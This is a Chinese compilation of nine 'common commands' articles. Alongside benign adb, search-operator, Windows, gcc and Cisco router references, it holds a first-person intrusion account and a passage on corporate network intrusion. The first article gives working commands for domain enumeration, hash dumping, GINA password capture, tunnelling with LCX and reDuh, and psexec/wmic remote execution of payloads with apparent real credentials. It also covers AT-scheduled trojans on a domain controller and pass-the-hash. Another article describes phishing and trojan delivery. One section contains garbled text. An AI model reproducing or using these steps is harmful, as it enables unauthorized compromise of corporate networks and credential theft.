内网渗透常用命令(共9篇)
内网渗透常用命令 篇1
1.收集信息。
1-1.无论是什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。
既然有了他的机器,那么翻翻他的电脑这是必要的,如果你说要怎么翻,你可以尝试熟悉他的电脑甚至比他本人还熟,那你就算了解详细了。一台个人用的电脑,从上面翻出与他自己相关的一些信息,和大量公司信息应该是没有问题的,除非,这是台新电脑。
1-2.了解了一定的人员信息,期间你要记下你所掌握到的账号,密码这些重要数据,以后有一定的用,所以,在你渗之前,不妨建个记事本将重要信息保存起来,写个记事本不会浪费你多少时间。接下来,我们就应该对这个网络进行一定的了解,他是一般的内网,还是域?一般大公司都会用域的,我们只需要查一下就知道,要想对他进行渗透,你就必须了解他的网络拓补,当然,一些太具体的物理上我们是无法了解的,我们只能了解我们所能知道的。不管他是INT,DMZ,LAN,我们必须足够掌握。在这,我们就会用到一定的命令,相信大家应该都很熟悉。
ipconfig /all 查询一下本机的一些情况,IP段 网关 属于不属于域
net view 查询一些存在联系的机器,一般以机器名显示,我们需要对其PING出IP,一是方便查询哪些重要机器的IP,二是方便查询存在几个段
net view /domain 查询有几个域 因为大型网络里面一般不止一个域的 net group /domain 查询域里面的组 net user /domain 查询域用户
net group “domain admins” /domain 查询域管理用户组
这些都是我们需要了解的,当然有时候还会需要再查询一些信息,NET命令下你们都会找到,不需要我再重复,具体的情况具体分析问题。
2.信息归档
2-1。有了信息,我们就要对信息进行一定的归档,将每个机器名所对应的IP归档,方便用时不会乱。2-2。查询出的用户,管理员,我们也必须归档。
2-3。查询信息时可能出现的有利用价值信息必须归档。3.技术利用
3-1。不论是通过键盘记录。或者HASH的抓取,我们需要将账号,密码,邮箱,凡是涉及关键数据的全部保存,一方面是准备渗透的资料,二是防止当前利用机器会掉。3-1-1。利用远控的键盘记录进行抓取。
3-1-2。利用PWDUMP7或者GETHASHES进行抓取HASH,然后破解。GETHASHES V1.4后 可以抓取域的全部HASH。3-1-3。用GINASTUB.DLL获取管理员的账号和密码。因为域管理员有权限登陆任何一台机器。种上这个只是方便记录他所登陆的密码。INSTALL后,会在SYSYTEM32下生成一个 FAXMODE.INC 文件记录密码。
3-2。有了内网,很多东西我们是没有必要直接在当前利用机器上操作的,别人虽然是内网,但是不代表他没有防御系统,所以,我们建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都会了吧。
3-2-1。我在这推荐 VIDC 这个工具,很方便,在CMD下直接操 VIDC.EXE-D-P PORT 就可以了。
3-2-2。在利用机器上使用LCX,CMD下 LCX.EXE-SLAVE 服务器IP PORT 127.0.0.1 PORT,然后到服务器上 CMD下 LCX.EXE-LISTEN 服务器IP PORT 任意PORT。
3-2-3。建立SOCKS后在本地可以用SOCKSCAP来进行连接,成功连接后该操作什么就看你们自己了。
基本上我们就只能操作这么多了,后面已经没有什么技术上的再使用或利用,但是这中间的经验不少,所需要处理的细节也不少。
我们在得到内网机器后,如果他存在域,但是没有使用域账号怎么办?那我们只能查询或者想尽一切手段获得他常用的账号密码,然后利用这个账号密码,再通过SOCKS进入域。这其中就关系到各位同行查看控制机器的文件,还有记录密码,GINA,HASH破解,这些都是必须的。
进入域后,我们又该怎么做,建立SOCKS后又该怎么做。我们可以扔S上去查看主要的端口,我们可以对端口进行弱口令的尝试,我们可以针对内网的WEB进行检测,方式很多,甚至你可以用MS08-067对另一台机器进行突破,但是相信我,能使用域的机器,大部分都是补丁打齐的。我们能利用的很少,但是不能灰心,只要能在内网穿梭,我们至少在防御上会轻松很多,我们需要的只是耐心和时间。
一旦拥有密码,我们就可以尝试IPC连接,直接拿下域,这就得看你们的权限有多大。net use IPipc$ password /user:username@domain 推荐使用这样的方式输入账号和密码,为什么?如果用户名存在空格,你这样输会保险些。什么 域用户不能存在空格? 是的,以前我也认为不会,微软的讲师也说不会,不过,经过我的测试和经验,那是假的,域 完全可以空格,除了 user name 这样的,还可以存在 user na me,不信 你可以试试。
建立IPC后,你只是想COPY文件 或者 RAR文件 再或者种马 那就是你的自由了。
后话:最近因为在渗域,在渗透过程中,也确实出现一些问题,几次都是不知如何进行,其实在技术上,并没有什么障碍。主要是在于对方有着比较强的主防御,而我的远控最开始连CMD都无法执行,后经过几天的环境测试,突破了CMD。有了CMD后,进行了查询,获得了一些信息,就开始了往下的渗透,被控机器的密码我不是跑出来的,我是翻他的文件翻出他常用密码的。因为他没有使用域账号,都是以系统账号登陆,所以无法查看域。我只能用他的域账号建立IPC连接,查找到内网的一个WEB服务,将其渗透后才算拿下了一个稳定的内网机器。
拿下内网WEB服务器后,我就已经完全在域内,没有使用HASH INJECTION,我是先查询了DOMAIN ADMINS,发现WEB服务器上的账号就属于这个组,PW后得到了HASH,破解掉我就连向了域控服务器的IPC$。
连接了IPC$,直接在其SYSYTEM32下扔了一个远控,然后用AT命令将其启动,这期间我尝试了5个SHIFT,但是SHIFT关闭后,我的远控也会掉,所以排除了这种方法,还是用AT来ADD NEW JOB 比较方便。
给域控服务器种了远控,利用CMD来GETHASHES了全部的HASHES进行破解,很幸运的查到了文件管理组的用户,这才有了我后面的目标达成。
总的来说,我这次的渗透比较运气好,中间麻烦事不是太多,不过也花了半个月的时间,时间大部分花在测试防御环境,软件免杀,木马免杀,查找资料这些上面。
后来,我获取了他的网络拓补图,发现我所呆的区域只是一个小小的域,还有好几个域我还没有涉及到,在域的前面是DMZ,而DMZ前面当然是INT了。
已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来。常用命令
net view 查看同一域/工作组的计算机列表
net view /domain 查看域/工作组列表
net view /domain:Secwing 查看Secwing域中 计算机列表
net group /domain 查看所在域的组
net user /domain 查看所在域用户
net user /domain zerosoul 12345678 修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限
net localgroup administrators SECWINGzerosoul /add 域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行
下面的命令 只能用于 域控制器:
net group “Domain controllers” 查看域控制器(如果有多台)
net group 查看域的组
net group “domain admins” 查看域管理员
net group “domain users” 查看域管理员
PS:打开配置域控制器向导的命令 dcpromo
psexec /accepteula 绕过第一次验证窗口 mstsc/admin 解决hash无法抓出问题
wmic /node:172.16.19.96 /user:ABIMAQAdministrator /password:k78m90 process call create c:kav2009.exe psexec.exe-s-u administrator-p k78m90 172.16.16.2-c c:kav2009.exe 拷贝文件并且执行 psexec.exe-s-u administrator-p km3h7i 172.16.16.2-c c:kavgsecdump.exe-u 抓取hash net use 172.16.16.2IPC$ “k78m90” /user:“admintitrator” net use 172.16.16.2IPC$ “k78m90” /user:“aABIMAQAdministrator” net time 172.16.16.2 at 172.16.16.2 13:50 2009.exe
java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令 [createTunnel]1234:127.0.0.1:3389 端口转向命令
iam-alt-h user-hash 这样hash就被注入了 whosthere-alt.exe 来查看是否被注入成功。
adb常用命令总结 篇2
ADB ADB = Android Debug Bridge
顾名思义,这个是PC机与Android设备的连接桥。简单的说,就是通过adb ,PC可以控制与之相连的Android设备。
1,android手机连上PC,或者虚拟机启动之后,一般PC都会检测到设备并且自动连接上。我们用以下命令可以查看当前连接的设备列表:
>>adb devices
2,android是个Linux系统。我们可以通过adb启动一个Linux终端,执行Android上的Linux命令。通过以下操作:
>>adb shell 执行之后,进入android终端,输入的命令都是在手机上执行的。例如我们输入ls,(此命令后面可以跟具体的路径)看到的文件和目录都是手机里的。
通过操作CTRL+D 或exit 就可以退出shell远程连接
3,重启手机。有时候手机被锁屏了,或者被无限的弹出窗口占用了屏幕,无法重启了,可以利用adb来重启手机。
>>adb reboot 重启到Recovery界面
>>adb reboot recovery
重启到bootloader界面
>>adb reboot bootloader
4,有时候,手机连接PC会出现问题,用adb devices查看到的是一串问号。这个时候,可以尝试:
>>adb kill-server
输入这个命令之后,立即(经验,10秒以内)输入:
>>adb devices 或者输入 >>adb start-server 这样,手机会重新连接PC。
5,拷贝文件到手机里
>>adb push [PC文件路径] [手机的目录]
因为每次只能拷贝一个文件到手机上,如果需要批量拷贝,可以自己写一个shell。
6,从手机上拷贝文件到PC里(必须有root权限)>>adb pull [手机文件路径] [PC的目录]
每次只能拷贝一个文件
7,安装apk到手机上。>>adb install [PC上的APK路径]
Android手机有个设置,可以设置是否允许安装非签名的应用程序。但是用adb install方式,可以绕开这个设置。也就是说,不论手机是否允许安装非签名的应用程序,用adb install总能把apk安装到手机上。
重新安装该软件
adb install-r apk文件名称.apk
与之相对应的卸载,还有
>>adb uninstall [应用程序包名]
8,有时候,连接会变的不稳定。这个时候,需要重新挂载一下手机。用以下命令:
>>adb remount
9,查看Log
>>adb logcat
10、如果adb没有权限就
adb kill-server adb start-server
搜索引擎常用搜索命令 篇3
搜索引擎是搜集互联网上的信息,汇总整理后,为大家提供方便的信息查询系统,如今搜索引擎以成千万网民上网必用的工具之一,方便了广大生活、学习、娱乐,怎么能更好的使用搜索引擎,下面Seoer惜缘列出了部分搜索引擎查询命令,让我们更好的使用搜索引擎:
intitle命令:
intitle的含义在于搜索网页标题中含有的关键词,例如想搜索标题中含有“it”的内容,就搜索intitle:it ,就会搜索到网页标题中含有it关键词的网页.
“”命令:
“”的含义在于搜索含有关键词内的网页(网站推广www.51hlht.com),例如想搜索标题中含有“baidu”的内容,就搜索“baidu” ,就会搜索到网页中含有关键词baidu的网页.
搜索号码命令
例如想在搜索引擎输入手机号、ip地址、都能查询到手机号的注册地址,ip所在的地址,
site命令:
site的含义在于检索查看设定的网站在搜索引擎中收录抓取内容的数量,例如搜索“site:www.noseo.org.cn“就能查询到搜索引擎收录noseo多少页内容。
+命令与domain命令
+命令与domain命令的含义在于检索网站在搜索引擎中反面链接页面,例如想搜索有什么网页链接到www.51hlht.com的页面,就可以输入domain:www.51hlht.com或者+ www.51hlht.com
mp3命令
mp3命令在查询音乐的下载试听地址,如想搜索歌曲“我和你”的下载试听地址,就可可以输入“mp3:我和你”查询,
inurl命令
inurl命令在于查询网址中含有的关键词,如搜索网址中含有关键词“baidu”的词语,就可以输入“inurl:baidu”查询。
其它铺助搜索命令:
利用-来限定关键词一定不要出现在结果中。 例如:键入seo-网站,会找出包含seo但除了网站的网站。
利用*代替所有的字母,模糊检索那关键词或者是不能确定的关键词。 例如:键入“爱*”后的会查询到包含爱字的相关内容。
利用可以把多个关键词划分为一组,并进行优先查询。 例如:键入“(seo+网络)”来搜索包含“seo”与“网络”的信息.
利用and 表示前后两个关键词是“与”的逻辑关系。 例如输入关键词:聊城 and 江北水城 会找出将包含聊城和江北水城有关的网站。
利用or(|)表示前后两个词是“或”的逻辑关系。 例如输入关键词:聊城 or 出口,会找出将包含聊城 或者出口 的网页。
以上信息在最实用的百度搜索引擎中均可使用。
百度查询页关于网址中代码的含义:
如搜索关键词“知识”第二页,网址如下:www.baidu.com/s?lm=0&si=&rn=10&ie=gb2312&ct=0&wd=%D6%AA%CA%B6&pn=10&ver=0&cl=3
其中:
wd代表查询关键词
cl=3代表网页搜索
ie=gb2312代表查询输入关键词的编码
tn代表
pn代表显示搜索结果的页数
rn代表页面显示搜索结果的数量
Win 7常用运行命令总结 篇4
Windows7作为微软新操作系统,有哪些运行命令呢?
1、wiaacmgr: 扫描仪和照相机向导
2、psr:问题步骤记录器
3、PowerShell:提供强大远程处理能力
4、colorcpl:颜色管理,配置显示器和打印机等中的色彩。
5、credwiz:备份或还原储存的用户名和密码
6、eventvwr:事件查看器管理单元(MMC) ,主要用于查看系统日志等信息。
7、wuapp:Windows更新管理器,建议设置为更新提醒模式
8、wf.msc:高级安全Windows防火墙
9、soundrecorder:录音机,没有录音时间的限制
10、snippingtool:截图工具,支持无规则截图
11、slui:Windows激活,查看系统激活信息
12、sdclt:备份状态与配置,就是查看系统是否已备份
13、Netplwiz:高级用户帐户控制面板,设置登陆安全相关的选项
14、msdt:微软支持诊断工具
15、lpksetup:语言包安装/删除向导,安装向导会提示下载语言包
16、cleanmgr: 打开磁盘清理工具
17、compmgmt.msc: 计算机管理
18、eudcedit: 造字程序
19、fsmgmt.msc: 共享文件夹管理器
20、gpedit.msc: 组策略
21、iexpress: 工具,系统自带
22、logoff: 注销命令
23、lusrmgr.msc: 本机用户和组
24、MdSched:来启动Windows内存诊断程序
25、mstsc: 远程桌面连接
26、Msconfig.exe: 系统配置实用程序
27、mplayer2: 简易widnows media player
28、mspaint: 画图板
29、magnify: 放大镜实用程序
30、mmc: 打开控制台
31、mobsync: 同步命令
32、notepad: 打开记事本
33、nslookup: 网络管理的工具向导
34、narrator: 屏幕“讲述人”
35、netstat : an(TC)命令检查接口
36、OptionalFeatures:打开“打开或关闭Windows功能”对话框
37、osk: 打开屏幕键盘
38、perfmon.msc: 计算机性能监测程序
39、regedt32: 注册表编辑器
40、rsop.msc: 组策略结果集
41、regedit.exe: 注册表
42、services.msc: 本地服务设置
43、sysedit: 系统配置编辑器
44、sigverif: 文件签名验证程序
45、shrpubw: 创建共享文件夹
46、secpol.msc: 本地安全策略
47、syskey: 系统加密
48、Sndvol: 音量控制程序
49、sfc.exe: 系统文件检查器
50、sfc /scannow: windows文件保护(扫描错误并复原)
51、taskmgr: 任务管理器
52、utilman: 辅助工具管理器
53、winver: 检查Windows版本
54、wmimgmt.msc: 打开windows管理体系结构(WMI)
55、Wscript.exe: windows脚本宿主设置
56、write: 写字板
57、conf: 启动系统配置实用程序
58、charmap: 启动字符映射表
59、calc: 启动计算器
60、chkdsk.exe: Chkdsk磁盘检查
61、cmd.exe: CMD命令提示符
62、certmgr.msc: 证书管理实用程序
63、Clipbrd: 剪贴板查看器
64、dvdplay: DVD播放器
65、diskmgmt.msc: 磁盘管理实用程序
66、dfrg.msc: 磁盘碎片整理程序
67、devmgmt.msc: 设备管理器
68、dxdiag: 检查DirectX信息
69、dcomcnfg: 打开系统组件服务
70、explorer: 打开资源管理器
浅析企业内网渗透 篇5
一个企业,可以是不同行业,他们所包含的机密数据,隐蔽数据,功能控制,和对整个旗下的可信任域都是极为重要的安全方向。
对于初具规模的企业来说,内部沟通需要邮件,即时沟通需要im软件,需要有域控,需要有核心交换机,有几个指定内外网交换出口,或连通IDC的内网通道,这些,对于互联网企业来说都是必不可少的,但是完善的同时也存在着一些安全隐患。
0×01邮件与IM安全
或 许邮件地址的方法简单,通俗一些,可以看招聘所留下的邮箱,可以看网站上的联系我们等等。而利用邮件作为入手点,也是大部分想渗透到企业内网的 hacker们的必备工具之一。邮件中,可以包含可执行文件,可以放木马,可以放挂马链接,也可以做钓鱼。总之第一步就是诱惑其种马。%关注,企业内网安全,第一处,邮件安全%
其次,获得相关企业的im软件,沟通内部人员,以获得信任,同样可以发送一些木马之类的,这一步主要是诱导。
%关注,企业内网安全,第二处,即时通讯%
以上这两种方法可以不费吹灰之力,只要马做的好,信息写的诱惑一些,就可以搞定内网的某些机器。
0×02 办公网安全
当获得内网机的权限后,便可以用其来做跳板,代理,或直接命令操控都可以。%关注,内网办公平台办公网安全%
办公网的机器,一般都是由域来控制的,而获得了域控管理员的账号密码,那便是获得了内网所有加入域的机器的权限,而在没获得域控的前提下,可以看看内网的共享,内网的弱口令,内网的一些测试服务器(这种服务器一般都是无密码或账号密码一样或者是弱口令)
如果是以太网,可以进行内网的一些账号密码嗅探,但是如果有IPS等设备,很容易被监控到,
另外在,办公网的机器上,会存有一些常用服务器的账号密码,如果是明文那么就很容易得到相应的信息及权限%关注,服务器密码及机密数据的保存%,得到这些,对整个内网及IDC的渗透便会更近一步。
如果,弄到了核心交换机的账号密码,那么便是掌握了整个内网的命脉,如果是恶意行为,一个病毒便可以弄瘫全网。
0×03web安全
除 此之外,可以有另一种思路,便是我们经常所讨论的,web安全,因为web应用所在的IDC一般会有内网专用的运维通道,如果没有,也可以从运维的来源 ip找到企业的出口ip,如开放了某些协议,对其DDOS,影响也会很大。Web的渗透这块就不用说了,各种方法,提权,其实在去渗透C段的时候,可以观 察其登陆的来源IP,可能有意向不到的结果。%关注,web安全%
0×04 子公司间的策略控制
有些公司的总公司安全做的很好,但是他们疏忽了子公司,因为总-子会有内网连通,子公司的安全性比较薄弱,容易入侵,这样渗透总公司便更加容易。%关注,与子公司之间的策略及控制%
当 得到了一个企业的一定网络权限,也许就会掌握这个企业的命脉,机密资料,人员信息,网站的控制。举个例子,如金融行业,股票操盘等数据对其极为重要,如泄 露或许会使一大部分人盈利,自己也会损失惨重。传媒行业,可以屏蔽信息,修改舆论,获得内部新闻资料及相关人士的信息。另外,还有游戏行业,搜索引擎,等等。都需要来关注内网的安全。
0×05 总结
其实,对于内网的渗透,要一步一步来,不能着急,不要产生过大的数据量。而对于其安全来说,要完善监控,完善策略,加强管理,得到重视。
企业安全,需要得到重视,如果一旦被攻破,那么将会损失惨重,如果遇到有目的,且恶意的攻击渗透,那么这将会是一场腥风血雨。
内网渗透常用命令 篇6
功能:.gz 后缀,只能压缩文件,不能压缩目录,不保留源文件
vcD4KPHA+w/zB7sP7s8ajunRhcjwvcD4KPHA+uabE3KO6tPKw/DwvcD4KPHA+PGltZyBzcmM9”www.2cto.com/uploadfile/Collfiles/1202/2014192457234.png“ alt=”“>
命令名称:zip、unzip
功能:保留源文件 -r 压缩目录
命令名称:bzip2
内网渗透常用命令 篇7
GCC 是 GNU 的 C 和 C++ 编译器。实际上,GCC 能够编译三种语言:C、C++ 和 O
bject C(C 语言的一种面向对象扩展)。利用 gcc 命令可同时编译并连接 C 和 C++
源程序。
运行 gcc/egcs
**********运行 gcc/egcs***********************
GCC 是 GNU 的 C 和 C++ 编译器。实际上,GCC 能够编译三种语言:C、C++ 和 O
bject C(C 语言的一种面向对象扩展)。利用 gcc 命令可同时编译并连接 C 和 C++
源程序。
如果你有两个或少数几个 C 源文件,也可以方便地利用 GCC 编译、连接并生成可
执行文件。例如,假设你有两个源文件 main.c 和 factorial.c 两个源文件,现在要编
译生成一个计算阶乘的程序。
代码:
-----------------------
清单 factorial.c
-----------------------
int factorial (int n)
{
if (n <= 1)
return 1;
else
return factorial (n - 1) * n;
}
-----------------------
清单 main.c
-----------------------
#include tdio.h>
#include
int factorial (int n);
int main (int argc, char **argv)
{
int n;
if (argc < 2)
{
printf (“Usage: %s nn”, argv [0]);
return -1;
}
else
{
n = atoi (argv[1]);
printf (“Factorial of %d is %d.n”, n, factorial (n));
}
return 0;
}
-----------------------
利用如下的命令可编译生成可执行文件,并执行程序:
$ gcc -o factorial main.c factorial.c
$ ./factorial 5
Factorial of 5 is 120.
GCC 可同时用来编译 C 程序和 C++ 程序,
一般来说,C 编译器通过源文件的后缀
名来判断是 C 程序还是 C++ 程序。在 Linux 中,C 源文件的后缀名为 .c,而 C++ 源
文件的后缀名为 .C 或 .cpp。但是,gcc 命令只能编译 C++ 源文件,而不能自动和 C
++ 程序使用的库连接。因此,通常使用 g++ 命令来完成 C++ 程序的编译和连接,该程
序会自动调用 gcc 实现编译。假设我们有一个如下的 C++ 源文件(hello.C):
#include
void main (void)
{
cout << “Hello, world!” << endl;
}
则可以如下调用 g++ 命令编译、连接并生成可执行文件:
$ g++ -o hello hello.C
$ ./hello
Hello, world!
**********************gcc/egcs 的主要选项*********
gcc 命令的常用选项
选项 解释
-ansi 只支持 ANSI 标准的 C 语法。这一选项将禁止 GNU C 的某些特色,
例如 asm 或 typeof 关键词。
-c 只编译并生成目标文件。
-DMACRO 以字符串“1”定义 MACRO 宏。
-DMACRO=DEFN 以字符串“DEFN”定义 MACRO 宏。
-E 只运行 C 预编译器。
-g 生成调试信息。GNU 调试器可利用该信息。
-IDIRECTORY 指定额外的头文件搜索路径DIRECTORY。
-LDIRECTORY 指定额外的函数库搜索路径DIRECTORY。
-lLIBRARY 连接时搜索指定的函数库LIBRARY。
-m486 针对 486 进行代码优化。
-o FILE 生成指定的输出文件。用在生成可执行文件时。
-O0 不进行优化处理。
-O 或 -O1 优化生成代码。
-O2 进一步优化。
-O3 比 -O2 更进一步优化,包括 inline 函数。
-shared 生成共享目标文件。通常用在建立共享库时。
-static 禁止使用共享连接。
-UMACRO 取消对 MACRO 宏的定义。
-w 不生成任何警告信息。
-Wall 生成所有警告信息。
内网渗透常用命令 篇8
router>
router> enable
router#
router# configure terminal
router(config)#
router(config)# interface Type Port
router(config-if)# no shutdown
router(config-if)# ip address IP-Address Subnet-Mask
router(config-if)# ^z
配置RIP路由协议:30秒更新一次
router(config)# router rip
router(config-if)# network Network-Number <--通告标准A,B,C类网-->
router(config-if)# ^z
配置IGRP路由协议:90秒更新一次
router(config)# router igrp AS-Number <-- AS-Number范围1~65535-->
router(config-if)# network Network-Number <--通告标准A,B,C类网-->
router(config-if)# ^z
配置Novell IPX路由协议:Novell RIP 60秒更新一次
router(config)# ipx routing [node address]
router(config)# ipx maximum-paths Paths <--设置负载平衡,范围1~512-->
router(config)# interface Type Port
router(config-if)# ipx network Network-Number [encapsulation encapsulation-type] [secondary] <--通告标准A,B,C类网-->
router(config-if)# ^z
配置DDR:
router(config)# dialer-list Group-Number protocol Protocol-Type permit [list ACL-Number]
router(config)# interface bri 0
router(config-if)# dialer-group Group-Number
router(config-if)# dialer map Protocol-Type Next-Hop-Address name Hostname Telphone-Number
router(config-if)# ^z
配置ISDN:
router(config)# isdn swith-type Swith-Type <--配置ISDN交换机类型,中国使用basic-net3-->
router(config-if)# ^z
配置Frame. Relay:
router(config-if)# encapsulation frame-relay [cisco | ietf ]
router(config-if)# frame-relay lmi-type [ansi | cisco | q933a ]
router(config-if)# bandwidth kilobits
router(config-if)# frame-relay invers-arp [ Protocol ] [dlci ]
<--配置静态Invers ARP表:
router(config)# frame-relay Protocol Protocol-Address DLCI [ Broadcast ] [ ietf | cisco ] [ payload-compress | packet-by-packet ]
-->
<--设置Keepalive间隔:
router(config-if)# keepalive Number
-->
<--为本地接口指定DLCI:
router(config-if)# frame-lelay local-dlci Number
-->
<--子接口配置:
router(config-if)# interface Type Port.Subininterface-Number [ multipoint | point-to-point ]
router(config-subif)# ip unnumbered Interface
router(config-subif)# frame-lelay local-dlci Number
-->
router(config-if)# ^z
配置标准ACL:
router(config)# access-list Access-List-Number [ permit | deny ] source [ source-mask ] <-- Access-List-Number 范围:1~99标准ACL;100~199扩展ACL;800~899标准IPX ACL;900~999扩展IPX ACL;1000~1099 IPX SAP ACL;600~699Apple Talk ACL-->
router(config)# interface Type Port
router(config-if)# ip access-group Access-List-Number [ in | out ]
router(config-if)# ^z
配置扩展ACL:
router(config)# access-list Access-List-Number [ permit | deny ] [ Protocol | Protocol-Number ] source source-wildcard [ Source-Port ] destination destination-wildcard [ Destination-Port ] [ established ]
router(config)# interface Type Port
router(config-if)# ip access-group Access-List-Number [ in | out ]
router(config-if)# ^z
配置命名ACL:
router(config)# ip access-list [ standard | extended ] ACL-Name
router(config [ std- | ext- ] nacl)# [ permit | deny ] [ IP-Access-List-Test-Conditions ]
router(config [ std- | ext- ] nacl)# no [ permit | deny ] [ IP-Access-List-Test-Conditions ]
router(config [ std- | ext- ] nacl)# ^z
router(config)# interface Type Port
router(config-if)# ip access-group [ACL-Name | 1~199 ] [ in | out ]
router(config-if)# ^z
配置DCE时钟:
router# show controllers Type Port <--确定DCE接口-->
router(confin-if)# clock rate 64000 <--进入DCE接口设置时钟速率-->
router(config-if)# ^z
配置PPP协议:
router(config)# username Name password Set-Password-Here <--验证方建立数据库-->
router(config)# interface Type Port
router(config-if)# encapsulation ppp <--启动PPP协议-->
router(config-if)# ppp outhentication [ chap | chap pap | pap chap | pap ] <--选择PPP认证-->
router(config-if)# ppp pap sent-username Name password Password <--发送验证信息-->
router(config-if)# ^z
PAP单向认证配置实例:
验证方:
router-server(config)# username Client password 12345 <--验证方建立数据库-->
router-server(config)# interface serial 0
router-server(config-if)# encapsulation ppp
router-server(config-if)# ppp authentication pap <--选择使用PAP实现PPP认证-->
router-server(config-if)# ^z
被验证方:
router-client(config-if)# encapsulation ppp
router-client(config-if)# ppp pap sent-username Client password 12345 <--发送验证信息-->
router-client(config-if)# ^z
PAP双向认证配置实例:
路由器 A:
routerA(config)# username B password 12345
routerA(config)# interface serial 0
routerA(config-if)# encapsulation ppp
routerA(config-if)# ppp authentication pap
routerA(config-if)# ppp pap sent-username A password 54321
routerA(config-if)# ^z
路由器 B:
routerB(config)# username A password 54321
routerB(config)# interface serial 1
routerB(config-if)# encapsulation ppp
routerB(config-if)# ppp authentication pap
routerB(config-if)# ppp pap sent-username B password 12345
routerB(config-if)# ^z
CHAP单向认证配置实例:
验证方:
router-server(config)# username router-client password 12345
router-server(config)# interface serial 0
router-server(config-if)# encapsulation ppp
router-server(config-if)# ppp authentication chap
router-server(config-if)# ^z
被验证方:
router-client(config-if)# encapsulation ppp
router-client(config-if)# ppp authentication chap
router-client(config-if)# ppp chap hostname router-client
router-client(config-if)# ppp chap password 12345
router-client(config-if)# ^z
CHAP双向认证配置实例:
路由器 A:
routerA(config)# username routerB password 12345
routerA(config)# interface serial 0
routerA(config-if)# encapsulation ppp
routerA(config-if)# ppp authentication chap
routerA(config-if)# ppp chap hostname routerA
routerA(config-if)# ppp chap password 54321
routerA(config-if)# ^z
路由器 B:
routerB(config)# username routerA password 54321
routerB(config)# interface serial 1
routerB(config-if)# encapsulation ppp
routerB(config-if)# ppp authentication chap
routerB(config-if)# ppp chap hostname routerB
routerB(config-if)# ppp chap password 12345
routerB(config-if)# ^z
Telnet使用:
routerA# terminal monitor <--可以传回在远端主机执行Debug命令的结果-->
routerA# telnet IP-Address [ Router-Name ] <--Telnet到指定的地址或名字的主机-->
routerB# [ exit | logout ] <--退出Telnet-->
routerB# ++<6>再按 <--挂起Telnet-->
routerA# show sessions <--显示当前所有Telnet的信息,包括Connect-Number -->
routerA# Connect-Number <--返回指定的Telnet连接-->
routerA# disconnect IP-Address [ Router-Name ] <--断开指定地址或名字的主机的连接-->
routerA# show user <--显示Telnet到本机的连接信息-->
routerA# clear line [ 0 | 1 | 2 | 3 | 4 ] <--断开指定Telnet到本机的连接-->
禁止任何Telnet到本机:
router(config)# line vty 0 4
router(config-line)# access-class ACL-Number
router(config)# ^z
设置主机名:
router(config)# hostname Set-Hostname
router(config)# ^z
router(config)# ^z
设置用户模式密码:
router(config)# line console 0
router(config-line)# login
router(config-line)# password Set-Password
router(config-line)# ^z
设置Telnet密码:
router(config)# line vty 0 4
router(config-line)# login
router(config-line)# password Set-Password
router(config-line)# ^z
设置特权模式密码:
内网渗透常用命令 篇9
自动化测试基本操作命令:
模拟点击操作:adb shell input tap 500 500(点击手机(500,500)坐标)模拟滑动屏幕操作:adb shell input swipe 200 500 400 500 模拟输入文本信息:adb shell input text helloworld 模拟按键命令:
adb shell input keyeventKEYCODE_VOLNME_DOWN按音量下键 adb shell input keyeventKEYCODE_VOLNME_UP
按音量上键 adb shell input keyevent 自动化测试中日志分析截图命令:
数据线连接手机截图:adb shell /system/bin/screencap–p /sdcard/screenshot.png 将截图复制到电脑盘中:adb pull /sdcard/screenshot.png E:download 输出所有已经安装应用: adb shell pm list package –f 查看预安APK adb shell pm list package-3 安装应用程序:
adb install –r 应用程序.apk 文件传输:
获取模拟器中的文件:adb pull
常用的发送键盘事件:
命令格式:adb shell input keyevent“value” 其中value以及对应的key code如下: